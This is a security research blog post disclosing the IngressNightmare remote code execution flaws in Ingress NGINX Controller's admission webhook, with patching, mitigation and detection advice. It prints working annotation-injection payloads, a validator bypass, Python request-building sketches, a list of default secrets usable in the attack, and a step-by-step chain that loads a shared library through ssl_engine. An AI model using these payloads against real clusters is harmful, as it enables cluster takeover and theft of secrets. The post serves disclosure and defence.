Wiz Research discovered CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 and CVE-2025-1974, a series of unauthenticated Remote Code Execution vulnerabilities in Ingress NGINX Controller for Kubernetes dubbed #IngressNightmare. Exploitation of these vulnerabilities gives attackers unauthorized access to all secrets stored across all namespaces in the Kubernetes cluster, which can result in complete cluster takeover.
This attack vector has been assigned a CVSS v3.1 base score of 9.8.
In this blog post, we share key learnings from our discovery of IngressNightmare, which affects the admission controller component of Ingress NGINX Controller for Kubernetes. Based on our analysis, about 43% of cloud environments are vulnerable, and our research uncovered over 6,500 clusters, including ones belonging to Fortune 500 companies, that expose vulnerable Kubernetes ingress controllers' admission controllers to the public internet, putting them at immediate critical risk.
We recommend patching as soon as possible. This blog post details the technical elements of the vulnerability and contains mitigation and detection guidance for defenders.
We would like to thank the Ingress-NGINX maintainers, particularly Marco Ebert, for their help in addressing the IngressNightmare vulnerabilities. Our team worked closely with the Kubernetes maintainers and security teams to ensure this attack surface was fully eliminated before public disclosure. The Kubernetes blog post can be found here, and Amazon and Google Cloud have also published their own advisories.
What is Ingress NGINX Controller for Kubernetes?
Ingress NGINX Controller is one of the most popular ingress controllers available for Kubernetes, and a core Kubernetes project, with over 18,000 stars on GitHub. Using Ingress-NGINX is one of the most common methods for exposing Kubernetes applications externally. As an ingress controller, its job is to accept incoming traffic and route it to the relevant Kubernetes Services, which in turn forward the traffic to the appropriate Pods, based on a set of rules. Specifically, Ingress NGINX Controller is based on the popular NGINX reverse proxy.
Ingress-NGINX is explicitly highlighted in the Kubernetes documentation as an example Ingress controller that fulfills the prerequisite for using Ingress in Kubernetes. Our research shows that over 41% of internet-facing clusters are running Ingress-NGINX.
The Vulnerability
Ingress NGINX deploys an admission controller within its pod, designed to validate incoming ingress objects before they are deployed. By default, admission controllers are accessible over the network without authentication, making them a highly appealing attack vector.
When the Ingress-NGINX admission controller processes an incoming ingress object, it constructs an NGINX configuration from it and then validates it using the NGINX binary. Our team found a vulnerability in this phase that allows injecting an arbitrary NGINX configuration remotely, by sending a malicious ingress object directly to the admission controller through the network.
During the configuration validation phase, the injected NGINX configuration causes the NGINX validator to execute code, allowing remote code execution (RCE) on the Ingress NGINX Controller’s pod.
The admission controller’s elevated privileges and unrestricted network accessibility create a critical escalation path. Exploiting this flaw allows an attacker to execute arbitrary code and access all cluster secrets across namespaces, which can lead to complete cluster takeover.
To be clear, gaining initial access to a cluster's pod network is not as difficult as one might think - containerization on its own is not a strong security boundary, and many applications running on K8s are susceptible to container escape, as we have repeatedly demonstrated in our research of cloud and SaaS applications over the past few years. Additionally, these vulnerabilities pair very well with SSRF vulnerabilities, which are an arguably common occurrence in web applications.
Mitigation & Detection
First, determine whether your clusters are using ingress-nginx. In most cases, you can check this (with at least cluster-scoped read-only permissions) by running:

```shell
kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx
```
This vulnerability is fixed in Ingress NGINX Controller version 1.12.1 and 1.11.5. We strongly recommend that cluster admins:
Update to the latest version of Ingress NGINX Controller.
Ensure the admission webhook endpoint is not exposed externally.
You can use this Nuclei template to check for exposed Ingress-NGINX admission controllers.
If you can’t upgrade immediately, consider one of these mitigations:
Enforce strict network policies so only the Kubernetes API Server can access the admission controller.
Temporarily disable the admission controller component of Ingress-NGINX if you cannot upgrade right away.
If you have installed ingress-nginx using Helm, reinstall with controller.admissionWebhooks.enabled=false.
If you have installed ingress-nginx manually, delete the ValidatingWebhookConfiguration called ingress-nginx-admission and remove the --validating-webhook argument from the ingress-nginx-controller container’s Deployment or DaemonSet.
Remember to re-enable the Validating Admission Controller after you upgrade, because it provides important safeguards for your Ingress configurations.
Wiz customers can use the pre-built query and advisory in the Wiz Threat Center. Wiz also validates for exposed admission controllers using the Wiz Dynamic Scanner. Finally, the Wiz Runtime Sensor detects zero-day vulnerabilities like IngressNightmare, by continuously monitoring ingress traffic, capturing malicious admission review requests in real-time, and flagging anomalous library loads to prevent similar attacks.
CVE-2025-24513 is different in nature from the other vulnerabilities in the IngressNightmare chain, as it does not lead to RCE.
How did we discover IngressNightmare?
Research Motivation
Kubernetes Admission Controllers present an interesting and often overlooked attack surface in a Kubernetes environment. They are triggered by the Kubernetes API server to review and potentially modify or block requests (AdmissionReview) before they are processed, and they often run with relatively high privileges within the cluster. Admission Controllers frequently don't require authentication and essentially function as web servers, introducing an additional internal network-accessible endpoint in the cluster. This architecture allows attackers to access them directly from any pod in the network, significantly increasing the attack surface.
Background on Ingress NGINX Controller for Kubernetes
Ingress NGINX Controller is an ingress implementation that uses NGINX as a reverse proxy and a load balancer. It is one of the most popular ingresses and is a core Kubernetes project.
To bridge Kubernetes and NGINX, a non-Kubernetes-native technology, the controller translates Kubernetes Ingress objects into NGINX configurations. To ensure the stability of the NGINX server, the controller employs a validating admission webhook that validates the final configuration before applying it.
From an attacker perspective, the admission controller is an unauthenticated HTTP endpoint responsible for complicated operations, and by default runs with a Kubernetes role that allows access to all of the environment’s secrets, making it an appealing research target.
Remote NGINX Configuration Injection
During our review of the Ingress NGINX Admission Controller code, we identified an interesting code path: when it processes incoming AdmissionReview requests, it generates a temporary NGINX configuration file based on a template file and the provided Ingress object. It then tests the validity of the temporary configuration file using the nginx -t command. We found multiple ways to inject new configuration directives in this code path.
```go
// testTemplate checks if the NGINX configuration inside the byte array is valid
// running the command "nginx -t" using a temporal file.
func (n *NGINXController) testTemplate(cfg []byte) error {
    ...
    tmpfile, err := os.CreateTemp(filepath.Join(os.TempDir(), "nginx"), tempNginxPattern)
    ...
    err = os.WriteFile(tmpfile.Name(), cfg, file.ReadWriteByUser)
    ...
    out, err := n.command.Test(tmpfile.Name())
    ...
}

func (nc NginxCommand) Test(cfg string) ([]byte, error) {
    //nolint:gosec // Ignore G204 error
    return exec.Command(nc.Binary, "-c", cfg, "-t").CombinedOutput()
}
```
Typically, only the Kubernetes API server should send these AdmissionReview requests. However, because the Admission Controller lacks authentication, an attacker with minimal network access could craft and send arbitrary AdmissionReview requests from any pod within the cluster.
For our testing, we used kube-review to create admission review requests from Ingress resource manifests, which could then be sent directly to the admission controller via HTTP.
```json
{
  "kind": "AdmissionReview",
  "apiVersion": "admission.k8s.io/v1",
  "request": {
    "uid": "732536f0-d97e-4c9b-94bf-768953754aee",
    ...
    "name": "example-app",
    "namespace": "default",
    "operation": "CREATE",
    ...
    "object": {
      "kind": "Ingress",
      "apiVersion": "networking.k8s.io/v1",
      "metadata": {
        "name": "example-app",
        "namespace": "default",
        ...
        "annotations": {
          "nginx.ingress.kubernetes.io/backend-protocol": "FCGI"
        }
      },
      "spec": {
        "ingressClassName": "nginx",
        "rules": [
          {
            "host": "app.example.com",
            "http": {
              "paths": [
                {
                  "path": "/",
                  "pathType": "Prefix",
                  "backend": {
                    "service": {
                      "name": "example-service",
                      "port": {}
                    }
                  }
                }
              ]
            }
          }
        ]
      },
      ...
    }
  }
}
```
Figure: Example of an Admission Review object
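A request like the one above can also be built programmatically. The following Python sketch assembles a minimal AdmissionReview envelope around an Ingress object; the field values and the make_admission_review helper are illustrative (mirroring what kube-review produces), not part of the controller's code:

```python
import json

def make_admission_review(annotations):
    """Wrap a minimal Ingress manifest in an AdmissionReview envelope,
    as the Kubernetes API server (or the kube-review tool) would."""
    ingress = {
        "kind": "Ingress",
        "apiVersion": "networking.k8s.io/v1",
        "metadata": {
            "name": "example-app",
            "namespace": "default",
            "annotations": annotations,
        },
        "spec": {"ingressClassName": "nginx", "rules": []},
    }
    return {
        "kind": "AdmissionReview",
        "apiVersion": "admission.k8s.io/v1",
        "request": {
            # Arbitrary placeholder UID; the webhook does not verify it.
            "uid": "00000000-0000-0000-0000-000000000000",
            "operation": "CREATE",
            "object": ingress,
        },
    }

review = make_admission_review(
    {"nginx.ingress.kubernetes.io/backend-protocol": "FCGI"}
)
print(json.dumps(review, indent=2))
```

The resulting JSON body can then be POSTed directly to the admission webhook endpoint over HTTPS.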
As can be seen above, there are plenty of fields we can control, showing the large attack surface. In this blog post we will look at two vulnerabilities in the annotation parsers that parse the .request.object.metadata.annotations field in the request above. Properties from this field are later included in the NGINX configuration file, which we used to inject arbitrary directives.
CVE-2025-24514 – auth-url Annotation Injection
The authreq parser is responsible for handling authentication-related annotations. It requires an auth-url field containing a URL, which is eventually propagated into the configuration file via this code flow:
```go
func (a authReq) Parse(ing *networking.Ingress) (interface{}, error) {
    // Required Parameters
    urlString, err := parser.GetStringAnnotation(authReqURLAnnotation, ing, a.annotationConfig.Annotations)
    if err != nil {
        return nil, err
    }
    ...
}
```
When the temporary configuration is created, $externalAuth.URL—which corresponds to the URL from the auth-url annotation—is incorporated without proper sanitization.
```
proxy_http_version 1.1;
proxy_set_header Connection "";
set $target {{ changeHostPort $externalAuth.URL $authUpstreamName }};
{{ else }}
proxy_http_version {{ $location.Proxy.ProxyHTTPVersion }};
set $target {{ $externalAuth.URL }};
{{ end }}
```
This lack of proper sanitization allows an attacker to inject arbitrary NGINX configuration directives, which get evaluated when nginx -t runs.
Consider the following auth-url annotation:
```
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\ninjection_point"
```
The final configuration will appear as follows:
```
...
proxy_http_version 1.1;
set $target http://example.com/#;
injection_point
proxy_pass $target;
...
```
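The breakout can be reproduced with a toy renderer. The template string below is a simplified stand-in for the controller's Go template, not its actual code; it only illustrates that verbatim substitution plus a '#' and a newline turns the annotation value into a freestanding directive:

```python
# Simplified stand-in for the relevant part of the Go template:
# the annotation value is substituted verbatim, with no sanitization.
TEMPLATE = "proxy_http_version 1.1;\nset $target {url};\nproxy_pass $target;"

# The '#' comments out the rest of the 'set' line, and the embedded
# newline starts a fresh line, so 'injection_point' becomes its own
# standalone NGINX directive.
malicious = "http://example.com/#;\ninjection_point"
rendered = TEMPLATE.format(url=malicious)
print(rendered)
```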
This vulnerability does not apply to v1.12.0. In this version, Ingress NGINX Controller changed its default security settings to verify all annotations, including auth-url, against strict regex rules.
CVE-2025-1097 – auth-tls-match-cn Annotation Injection
The authtls parser, for its auth-tls-match-cn annotation, uses CommonNameAnnotationValidator to validate the field value:
```go
func CommonNameAnnotationValidator(s string) error {
    if !strings.HasPrefix(s, "CN=") {
        return fmt.Errorf("value %s is not a valid Common Name annotation: missing prefix 'CN='", s)
    }
    if _, err := regexp.Compile(s[3:]); err != nil {
        return fmt.Errorf("value %s is not a valid regex: %w", s, err)
    }
    return nil
}
```
In other words, the auth-tls-match-cn annotation requires:
The value must start with CN=.
All remaining characters must form a valid regular expression.
Similar to the previous injection, $server.CertificateAuth.MatchCN corresponds to the value of the auth-tls-match-cn annotation. While tricky, we can still bypass both requirements to inject arbitrary NGINX configuration in this part of the template:
```
if ( $ssl_client_s_dn !~ {{ $server.CertificateAuth.MatchCN }} ) {
    return 403 "client certificate unauthorized";
}
```
Consider the following auth-tls-match-cn annotation:

```
nginx.ingress.kubernetes.io/auth-tls-match-cn: "CN=abc #(\n){}\n }}\nglobal_injection;\n#"
```
The final configuration will appear as follows:
```
...
set $proxy_upstream_name "-";
if ( $ssl_client_s_dn !~ CN=abc #(
){} }}
global_injection;
# ) {
return 403 "client certificate unauthorized"; }
...
```
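The bypass can be sanity-checked by re-implementing the validator's two rules in Python. Note this is an approximation: the controller uses Go's regexp package (RE2), while this sketch uses Python's re module, so edge cases may differ:

```python
import re

def common_name_ok(value):
    """Approximation of CommonNameAnnotationValidator: the value must
    start with 'CN=' and the remainder must compile as a regex."""
    if not value.startswith("CN="):
        return False
    try:
        re.compile(value[3:])
    except re.error:
        return False
    return True

payload = "CN=abc #(\n){}\n }}\nglobal_injection;\n#"
print(common_name_ok(payload))  # passes both validator checks...
print("\n" in payload)          # ...yet smuggles raw newlines into the config
```

The crafted value satisfies the prefix check, compiles as a regular expression, and still carries the newlines and braces needed to escape the if-block in the template.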
For the auth-tls-match-cn annotation value to appear in the configuration, we also need to provide the nginx.ingress.kubernetes.io/auth-tls-secret annotation, which corresponds to a TLS certificate or keypair secret present in the cluster. Since the service account used by Ingress NGINX has access to all secrets in the cluster, we can specify any secret name from any namespace, provided it matches the required TLS certificate/keypair format. Notably, many managed Kubernetes solutions include such secrets by default. Below is a short list of common secrets that can be leveraged in this type of attack:
kube-system/konnectivity-certs
kube-system/azure-wi-webhook-server-cert
kube-system/aws-load-balancer-webhook-tls
kube-system/hubble-server-certs
kube-system/cilium-ca
calico-system/node-certs
cert-manager/cert-manager-webhook-ca
linkerd/linkerd-policy-validator-k8s-tls
linkerd/linkerd-proxy-injector-k8s-tls
linkerd/linkerd-sp-validator-k8s-tls
CVE-2025-1098 – mirror UID Injection
The mirror annotation parser processes the UID from the ingress object and inserts it into $location.Mirror.Source in the temporary NGINX configuration. We control the ing.UID field, which gives us a new injection point. Since this injection is in the UID parameter, which is not a Kubernetes annotation, our input is not sanitized by the annotations’ regex rules. Because our input is inserted as-is, we can easily escape our context and inject arbitrary NGINX configuration directives.
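Conceptually, the behavior looks like the toy model below. The template string is hypothetical (the controller's real template differs); it only illustrates that a UID containing newlines and braces escapes the directive it was interpolated into:

```python
# Hypothetical mirror-location template: the ingress UID is
# interpolated verbatim, with no validation whatsoever.
MIRROR_TEMPLATE = "location = /_mirror-{uid} {{\n    internal;\n}}"

# A UID carrying braces and newlines closes the location block early
# and leaves 'global_injection;' as a top-level directive.
crafted_uid = "dummy {\n}\nglobal_injection;\n#"
rendered = MIRROR_TEMPLATE.format(uid=crafted_uid)
print(rendered)
```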
CVE-2025-1974 - NGINX Configuration Code Execution
The vulnerabilities above allow an attacker to inject arbitrary directives into the NGINX configuration, which is later tested by nginx -t. This does not immediately lead to code execution. However, if we can find a directive that executes arbitrary code during nginx -t, we can compromise the pod and obtain its highly privileged Kubernetes role. It is important to note that the NGINX configuration is only tested, not applied, which reduces the number of directives we can actually (ab)use.
Initially, we tried the load_module directive, which can load a shared library from the filesystem. However, it can only appear at the beginning of the NGINX configuration, so when injected mid-file, load_module fails validation with an error.
Fortunately, there are many usable directives in Ingress NGINX Controller, as its NGINX instance is compiled with many additional modules. We found that the ssl_engine directive, part of NGINX’s OpenSSL support, can also load shared libraries; this behavior is undocumented. Unlike load_module, this directive can be used at any point within the configuration file, making it suitable for our injection’s constraints.
We can now load arbitrary library files during the NGINX configuration testing phase. Our next challenge is: How can we place a shared library on the pod’s filesystem?
Uploading a shared library with NGINX Client Body Buffers
In parallel to the nginx -t validation and the admission controller webhook, the pod also runs the NGINX instance itself, listening on port 80 or 443.
When processing requests, NGINX sometimes saves the request body into a temporary file (client body buffering). This happens if the HTTP request body size is greater than a certain threshold, which is by default 8KB. This means that we should theoretically be able to send a large (>8KB) HTTP request, containing our payload in the form of a shared library as the body of the request, and NGINX will temporarily save it to a file on the pod’s filesystem.
Unfortunately, NGINX also removes the file immediately, creating a nearly impossible race condition. However, NGINX holds an open file descriptor pointing to the file, which remains accessible through ProcFS.
To keep the file descriptor open, we can set the Content-Length header in the request to be larger than the actual content size. NGINX will keep waiting for more data, causing the worker to hang and leaving the file descriptor open for longer.
The only downside to this trick is that the file is created by a different process, so we can’t use /proc/self to access it. Instead, we have to guess both the PID and the FD number to find the shared library; since this is a container with minimal processes, a few guesses usually suffice.
From Configuration Injection to RCE
With a reliable file upload to Ingress NGINX Controller’s pod, we can now put it all together to exploit this issue into a full-blown Remote Code Execution.
The exploit works as follows:
1. Upload our payload, in the form of a shared library, to the pod by abusing the client-body buffer feature of NGINX.
2. Send an AdmissionReview request to the Ingress NGINX Controller’s admission controller containing any one of our directive injections. The injected directive is ssl_engine, pointing at the ProcFS path of our payload’s file descriptor, which causes NGINX to load the file as a shared library.
3. If everything goes well, our shared library is loaded, and we execute code remotely.
Here is a demo of the exploit in practice:
Conclusions
We are only scratching the surface in reviewing the security of admission controllers. Initially, we were surprised to see that such a large code base is used behind the scenes. In our view, this attack surface should be restricted in a much better way: removing access from pods within the cluster, and never exposing this publicly. We were also surprised by the lack of least-privilege design, as the exploit ended up with privileges to take control of the cluster. During this research, we found other vulnerabilities in Ingress NGINX Controller, and we expect to find more in other admission controllers.
Finally, we learned that nginx -t should be considered harmful. We would be happy to hear about other cases where nginx -t processes unsanitized user input in the wild; this risk should be more clearly highlighted in the NGINX documentation.
Responsible Disclosure Timeline
December 31, 2024 – Wiz Research reported CVE-2025-1974 and CVE-2025-24514 to Kubernetes.
January 2, 2025 – Wiz Research reported CVE-2025-1097 to Kubernetes.
January 3, 2025 – Kubernetes acknowledged the reports.
January 9, 2025 – Kubernetes proposed a fix for CVE-2025-1097.
January 10, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1097.
January 12, 2025 – Kubernetes proposed a fix for CVE-2025-1974.
January 16, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1974.
January 20, 2025 – Kubernetes proposed a fix for CVE-2025-24513.
January 21, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-24513.
January 21, 2025 – Wiz Research reported CVE-2025-1098 to Kubernetes.
February 7, 2025 – Kubernetes released internal patches for the injection vulnerabilities: CVE-2025-1098, CVE-2025-1097, and CVE-2025-24514.
February 20, 2025 – Kubernetes notified Wiz Research that they removed the NGINX configuration validation from the admission controller, resolving CVE-2025-1974.
March 10, 2025 – Kubernetes sent embargo notifications regarding the five vulnerabilities reported by Wiz Research.
March 24, 2025 – Public disclosure.
Stay in touch!
Hi there! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), and Andres Riancho (@andresriancho) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: research@wiz.io.